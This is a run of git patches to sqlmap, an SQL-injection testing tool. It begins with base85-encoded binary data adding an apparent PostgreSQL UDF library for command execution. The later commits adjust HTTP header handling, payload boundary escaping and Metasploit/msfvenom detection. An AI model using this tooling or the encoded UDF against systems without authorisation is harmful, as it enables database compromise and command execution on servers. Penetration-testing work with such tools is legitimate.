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
EU_B#3UH||9

literal 0
HcmV?d00001

diff --git a/udf/postgresql/linux/32/9.4/lib_postgresqludf_sys.so_ b/udf/postgresql/linux/32/9.4/lib_postgresqludf_sys.so_
new file mode 100644
index 0000000000000000000000000000000000000000..3b8c49630e2833c547d513ee0c39467add02c0c8
GIT binary patch
literal 3167
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
FRO3J$Bar|A

literal 0
HcmV?d00001


From 8d7e915af779ea393f6f5a8458104d62f5140307 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Fri, 5 Jun 2015 17:02:56 +0200
Subject: [PATCH 435/492] Minor patch for #1260

---
 lib/core/common.py     | 8 ++++++++
 lib/request/connect.py | 9 +++++----
 2 files changed, 13 insertions(+), 4 deletions(-)

diff --git a/lib/core/common.py b/lib/core/common.py
index 1faef14ac..08e6cc46e 100755
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -1007,6 +1007,14 @@ def sanitizeStr(value):
 
     return getUnicode(value).replace("\n", " ").replace("\r", "")
 
+def getHeader(headers, key):
+    retVal = None
+    for _ in (headers or {}):
+        if _.upper() == key.upper():
+            retVal = headers[_]
+            break
+    return retVal
+
 def checkFile(filename):
     """
     Checks for file existence and readability
diff --git a/lib/request/connect.py b/lib/request/connect.py
index 470c3dcc9..9951ed5d0 100644
--- a/lib/request/connect.py
+++ b/lib/request/connect.py
@@ -37,6 +37,7 @@ from lib.core.common import evaluateCode
 from lib.core.common import extractRegexResult
 from lib.core.common import findMultipartPostBoundary
 from lib.core.common import getCurrentThreadData
+from lib.core.common import getHeader
 from lib.core.common import getHostHeader
 from lib.core.common import getRequestHeader
 from lib.core.common import getUnicode
@@ -338,16 +339,16 @@ class Connect(object):
             if kb.proxyAuthHeader:
                 headers[HTTP_HEADER.PROXY_AUTHORIZATION] = kb.proxyAuthHeader
 
-            if HTTP_HEADER.ACCEPT not in headers:
+            if not getHeader(headers, HTTP_HEADER.ACCEPT):
                 headers[HTTP_HEADER.ACCEPT] = HTTP_ACCEPT_HEADER_VALUE
 
-            if HTTP_HEADER.HOST not in headers or not target:
+            if not getHeader(headers, HTTP_HEADER.HOST) or not target:
                 headers[HTTP_HEADER.HOST] = getHostHeader(url)
 
-            if HTTP_HEADER.ACCEPT_ENCODING not in headers:
+            if not getHeader(headers, HTTP_HEADER.ACCEPT_ENCODING):
                 headers[HTTP_HEADER.ACCEPT_ENCODING] = HTTP_ACCEPT_ENCODING_HEADER_VALUE if kb.pageCompress else "identity"
 
-            if post is not None and HTTP_HEADER.CONTENT_TYPE not in headers:
+            if post is not None and not getHeader(headers, HTTP_HEADER.CONTENT_TYPE):
                 headers[HTTP_HEADER.CONTENT_TYPE] = POST_HINT_CONTENT_TYPES.get(kb.postHint, DEFAULT_CONTENT_TYPE)
 
             if headers.get(HTTP_HEADER.CONTENT_TYPE) == POST_HINT_CONTENT_TYPES[POST_HINT.MULTIPART]:

From 04c1d439a7479f56a6e765a73dfe83d1d38866c5 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Fri, 5 Jun 2015 17:18:21 +0200
Subject: [PATCH 436/492] Minor patch for #1260

---
 lib/request/basic.py | 6 ++++++
 1 file changed, 6 insertions(+)

diff --git a/lib/request/basic.py b/lib/request/basic.py
index c50ef2a73..41829c0ce 100755
--- a/lib/request/basic.py
+++ b/lib/request/basic.py
@@ -66,6 +66,12 @@ def forgeHeaders(items=None):
     headers = OrderedDict()
     for key, value in _.items():
         success = False
+
+        for _ in headers:
+            if _.upper() == key.upper():
+                del headers[_]
+                break
+
         if key.upper() not in (_.upper() for _ in getPublicTypeMembers(HTTP_HEADER, True)):
             try:
                 headers[_str(key)] = value  # dirty hack for http://bugs.python.org/issue12455

From e4b23c9beb671f24f7e7e74e47c07f237189647d Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Tue, 16 Jun 2015 12:00:56 +0200
Subject: [PATCH 437/492] Minor fix regarding POST redirects (ML)

---
 lib/request/connect.py         | 6 ++++++
 lib/request/redirecthandler.py | 4 ++--
 2 files changed, 8 insertions(+), 2 deletions(-)

diff --git a/lib/request/connect.py b/lib/request/connect.py
index 9951ed5d0..b3fe886f1 100644
--- a/lib/request/connect.py
+++ b/lib/request/connect.py
@@ -639,6 +639,12 @@ class Connect(object):
             _ = urlparse.urlsplit(conn.redurl)
             _ = ("%s%s" % (_.path or "/", ("?%s" % _.query) if _.query else ""))
             requestMsg = re.sub("(\n[A-Z]+ ).+?( HTTP/\d)", "\g<1>%s\g<2>" % re.escape(getUnicode(_)), requestMsg, 1)
+
+            if kb.resendPostOnRedirect is False:
+                requestMsg = re.sub("(\[#\d+\]:\n)POST ", "\g<1>GET ", requestMsg)
+                requestMsg = re.sub("(?i)Content-length: \d+\n", "", requestMsg)
+                requestMsg = re.sub("(?s)\n\n.+", "\n", requestMsg)
+
             responseMsg += "[#%d] (%d %s):\n" % (threadData.lastRequestUID, conn.code, status)
         else:
             responseMsg += "[#%d] (%d %s):\n" % (threadData.lastRequestUID, code, status)
diff --git a/lib/request/redirecthandler.py b/lib/request/redirecthandler.py
index 23b5a5774..73fa73f19 100644
--- a/lib/request/redirecthandler.py
+++ b/lib/request/redirecthandler.py
@@ -61,8 +61,8 @@ class SmartRedirectHandler(urllib2.HTTPRedirectHandler):
 
                 kb.resendPostOnRedirect = choice.upper() == 'Y'
 
-                if kb.resendPostOnRedirect:
-                    self.redirect_request = self._redirect_request
+            if kb.resendPostOnRedirect:
+                self.redirect_request = self._redirect_request
 
     def _redirect_request(self, req, fp, code, msg, headers, newurl):
         newurl = newurl.replace(' ', '%20')

From 9e5ef094a321d178d3a3b7906116340bffc2e36e Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Tue, 16 Jun 2015 22:20:21 +0200
Subject: [PATCH 438/492] Closes #1270

---
 lib/core/agent.py    | 8 ++++++--
 lib/core/settings.py | 1 +
 2 files changed, 7 insertions(+), 2 deletions(-)

diff --git a/lib/core/agent.py b/lib/core/agent.py
index 8f1b6c77b..aa308914b 100644
--- a/lib/core/agent.py
+++ b/lib/core/agent.py
@@ -33,6 +33,7 @@ from lib.core.enums import PAYLOAD
 from lib.core.enums import PLACE
 from lib.core.enums import POST_HINT
 from lib.core.exception import SqlmapNoneDataException
+from lib.core.settings import BOUNDARY_BACKSLASH_MARKER
 from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR
 from lib.core.settings import DEFAULT_COOKIE_DELIMITER
 from lib.core.settings import DEFAULT_GET_POST_DELIMITER
@@ -187,6 +188,9 @@ class Agent(object):
             if retVal == paramString and urlencode(parameter) != parameter:
                 retVal = _(r"(\A|\b)%s=%s" % (re.escape(urlencode(parameter)), re.escape(origValue)), "%s=%s" % (urlencode(parameter), self.addPayloadDelimiters(newValue.replace("\\", "\\\\"))), paramString)
 
+        if retVal:
+            retVal = retVal.replace(BOUNDARY_BACKSLASH_MARKER, '\\')
+
         return retVal
 
     def fullPayload(self, query):
@@ -237,7 +241,7 @@ class Agent(object):
             if not (expression and expression[0] == ';') and not (query and query[-1] in ('(', ')') and expression and expression[0] in ('(', ')')) and not (query and query[-1] == '('):
                 query += " "
 
-        query = "%s%s" % (query, expression)
+        query = "%s%s" % (query.replace('\\', BOUNDARY_BACKSLASH_MARKER), expression)
 
         return query
 
@@ -271,7 +275,7 @@ class Agent(object):
             pass
 
         elif suffix and not comment:
-            expression += suffix
+            expression += suffix.replace('\\', BOUNDARY_BACKSLASH_MARKER)
 
         return re.sub(r"(?s);\W*;", ";", expression)
 
diff --git a/lib/core/settings.py b/lib/core/settings.py
index 36a0b2909..b6563cc83 100644
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -50,6 +50,7 @@ UPPER_RATIO_BOUND = 0.98
 # Markers for special cases when parameter values contain html encoded characters
 PARAMETER_AMP_MARKER = "__AMP__"
 PARAMETER_SEMICOLON_MARKER = "__SEMICOLON__"
+BOUNDARY_BACKSLASH_MARKER = "__BACKSLASH__"
 PARTIAL_VALUE_MARKER = "__PARTIAL_VALUE__"
 PARTIAL_HEX_VALUE_MARKER = "__PARTIAL_HEX_VALUE__"
 URI_QUESTION_MARKER = "__QUESTION_MARK__"

From 7d418af274cd429cfac7fc29455425cfc4bab37f Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Mon, 22 Jun 2015 16:28:35 +0200
Subject: [PATCH 439/492] Fix for a bug reported privately by email

---
 lib/core/agent.py | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/lib/core/agent.py b/lib/core/agent.py
index aa308914b..f200d8f75 100644
--- a/lib/core/agent.py
+++ b/lib/core/agent.py
@@ -241,7 +241,8 @@ class Agent(object):
             if not (expression and expression[0] == ';') and not (query and query[-1] in ('(', ')') and expression and expression[0] in ('(', ')')) and not (query and query[-1] == '('):
                 query += " "
 
-        query = "%s%s" % (query.replace('\\', BOUNDARY_BACKSLASH_MARKER), expression)
+        if query:
+            query = "%s%s" % (query.replace('\\', BOUNDARY_BACKSLASH_MARKER), expression)
 
         return query
 

From b02be9674f8c5230d76f78a49ce43b2333a17cb8 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Fri, 26 Jun 2015 10:11:34 +0200
Subject: [PATCH 440/492] Fixes #1277

---
 lib/core/agent.py | 6 +++++-
 1 file changed, 5 insertions(+), 1 deletion(-)

diff --git a/lib/core/agent.py b/lib/core/agent.py
index f200d8f75..317d5c656 100644
--- a/lib/core/agent.py
+++ b/lib/core/agent.py
@@ -174,7 +174,10 @@ class Agent(object):
                     while True:
                         _ = re.search(r"\\g<([^>]+)>", repl)
                         if _:
-                            repl = repl.replace(_.group(0), match.group(int(_.group(1)) if _.group(1).isdigit() else _.group(1)))
+                            try:
+                                repl = repl.replace(_.group(0), match.group(int(_.group(1)) if _.group(1).isdigit() else _.group(1)))
+                            except IndexError:
+                                break
                         else:
                             break
                     retVal = string[:match.start()] + repl + string[match.end():]
@@ -185,6 +188,7 @@ class Agent(object):
                 retVal = _(regex, "%s=%s" % (parameter, self.addPayloadDelimiters(newValue.replace("\\", "\\\\"))), paramString)
             else:
                 retVal = _(r"(\A|\b)%s=%s(\Z|%s|%s|\s)" % (re.escape(parameter), re.escape(origValue), DEFAULT_GET_POST_DELIMITER, DEFAULT_COOKIE_DELIMITER), "%s=%s\g<2>" % (parameter, self.addPayloadDelimiters(newValue.replace("\\", "\\\\"))), paramString)
+
             if retVal == paramString and urlencode(parameter) != parameter:
                 retVal = _(r"(\A|\b)%s=%s" % (re.escape(urlencode(parameter)), re.escape(origValue)), "%s=%s" % (urlencode(parameter), self.addPayloadDelimiters(newValue.replace("\\", "\\\\"))), paramString)
 

From b212321c07e6fe02da720cf1b8034990d76f495c Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Fri, 26 Jun 2015 10:30:53 +0200
Subject: [PATCH 441/492] Fixes #1278

---
 lib/core/agent.py | 3 +--
 1 file changed, 1 insertion(+), 2 deletions(-)

diff --git a/lib/core/agent.py b/lib/core/agent.py
index 317d5c656..cf1005c3c 100644
--- a/lib/core/agent.py
+++ b/lib/core/agent.py
@@ -245,8 +245,7 @@ class Agent(object):
             if not (expression and expression[0] == ';') and not (query and query[-1] in ('(', ')') and expression and expression[0] in ('(', ')')) and not (query and query[-1] == '('):
                 query += " "
 
-        if query:
-            query = "%s%s" % (query.replace('\\', BOUNDARY_BACKSLASH_MARKER), expression)
+        query = "%s%s" % ((query or "").replace('\\', BOUNDARY_BACKSLASH_MARKER), expression)
 
         return query
 

From 97244f5e5ef069cc90919a6628fcd230431472b3 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Mon, 29 Jun 2015 00:20:35 +0200
Subject: [PATCH 442/492] Fixes #1279

---
 lib/core/agent.py | 6 ++++++
 1 file changed, 6 insertions(+)

diff --git a/lib/core/agent.py b/lib/core/agent.py
index cf1005c3c..59c361455 100644
--- a/lib/core/agent.py
+++ b/lib/core/agent.py
@@ -217,6 +217,9 @@ class Agent(object):
         if conf.direct:
             return self.payloadDirect(expression)
 
+        if expression is None:
+            return None
+
         expression = self.cleanupPayload(expression)
         expression = unescaper.escape(expression)
         query = None
@@ -258,6 +261,9 @@ class Agent(object):
         if conf.direct:
             return self.payloadDirect(expression)
 
+        if expression is None:
+            return None
+
         expression = self.cleanupPayload(expression)
 
         # Take default values if None

From 8b63ee9bc39edc7d62e563af02c3a1ef77ae4437 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Mon, 29 Jun 2015 01:12:14 +0200
Subject: [PATCH 443/492] Minor update for #1281

---
 lib/core/option.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/core/option.py b/lib/core/option.py
index df20fdcc8..2eba19026 100644
--- a/lib/core/option.py
+++ b/lib/core/option.py
@@ -289,7 +289,7 @@ def _feedTargetsDict(reqFile, addedTargetUrls):
                 line = line.strip('\r')
                 match = re.search(r"\A(%s) (.+) HTTP/[\d.]+\Z" % "|".join(getPublicTypeMembers(HTTPMETHOD, True)), line) if not method else None
 
-                if len(line) == 0 and method and method != HTTPMETHOD.GET and data is None:
+                if len(line.strip()) == 0 and method and method != HTTPMETHOD.GET and data is None:
                     data = ""
                     params = True
 

From 7b95a2d80dfda1accf5594e7224fd278d6561173 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Mon, 29 Jun 2015 10:05:16 +0200
Subject: [PATCH 444/492] Patch for an Issue #1280

---
 lib/core/option.py         | 31 +++++++++++++++++++++++--------
 lib/takeover/metasploit.py | 28 ++++++++++++++++++++++------
 2 files changed, 45 insertions(+), 14 deletions(-)

diff --git a/lib/core/option.py b/lib/core/option.py
index 2eba19026..db7cb8c44 100644
--- a/lib/core/option.py
+++ b/lib/core/option.py
@@ -766,8 +766,14 @@ def _setMetasploit():
 
     if conf.msfPath:
         for path in (conf.msfPath, os.path.join(conf.msfPath, "bin")):
-            if all(os.path.exists(normalizePath(os.path.join(path, _))) for _ in ("", "msfcli", "msfconsole", "msfencode", "msfpayload")):
+            if all(os.path.exists(normalizePath(os.path.join(path, _))) for _ in ("", "msfcli", "msfconsole")):
                 msfEnvPathExists = True
+                if all(os.path.exists(normalizePath(os.path.join(path, _))) for _ in ("msfvenom",)):
+                    kb.msfVenom = True
+                elif all(os.path.exists(normalizePath(os.path.join(path, _))) for _ in ("msfencode", "msfpayload")):
+                    kb.msfVenom = False
+                else:
+                    msfEnvPathExists = False
                 conf.msfPath = path
                 break
 
@@ -798,15 +804,23 @@ def _setMetasploit():
         for envPath in envPaths:
             envPath = envPath.replace(";", "")
 
-            if all(os.path.exists(normalizePath(os.path.join(envPath, _))) for _ in ("", "msfcli", "msfconsole", "msfencode", "msfpayload")):
-                infoMsg = "Metasploit Framework has been found "
-                infoMsg += "installed in the '%s' path" % envPath
-                logger.info(infoMsg)
-
+            if all(os.path.exists(normalizePath(os.path.join(envPath, _))) for _ in ("", "msfcli", "msfconsole")):
                 msfEnvPathExists = True
-                conf.msfPath = envPath
+                if all(os.path.exists(normalizePath(os.path.join(envPath, _))) for _ in ("msfvenom",)):
+                    kb.msfVenom = True
+                elif all(os.path.exists(normalizePath(os.path.join(envPath, _))) for _ in ("msfencode", "msfpayload")):
+                    kb.msfVenom = False
+                else:
+                    msfEnvPathExists = False
 
-                break
+                if msfEnvPathExists:
+                    infoMsg = "Metasploit Framework has been found "
+                    infoMsg += "installed in the '%s' path" % envPath
+                    logger.info(infoMsg)
+
+                    conf.msfPath = envPath
+
+                    break
 
     if not msfEnvPathExists:
         errMsg = "unable to locate Metasploit Framework installation. "
@@ -1794,6 +1808,7 @@ def _setKnowledgeBaseAttributes(flushAll=True):
     kb.matchRatio = None
     kb.maxConnectionsFlag = False
     kb.mergeCookies = None
+    kb.msfVenom = False
     kb.multiThreadMode = False
     kb.negativeLogic = False
     kb.nullConnection = None
diff --git a/lib/takeover/metasploit.py b/lib/takeover/metasploit.py
index 4f7b43887..14364c77d 100644
--- a/lib/takeover/metasploit.py
+++ b/lib/takeover/metasploit.py
@@ -24,6 +24,7 @@ from lib.core.common import randomRange
 from lib.core.common import randomStr
 from lib.core.common import readInput
 from lib.core.data import conf
+from lib.core.data import kb
 from lib.core.data import logger
 from lib.core.data import paths
 from lib.core.enums import DBMS
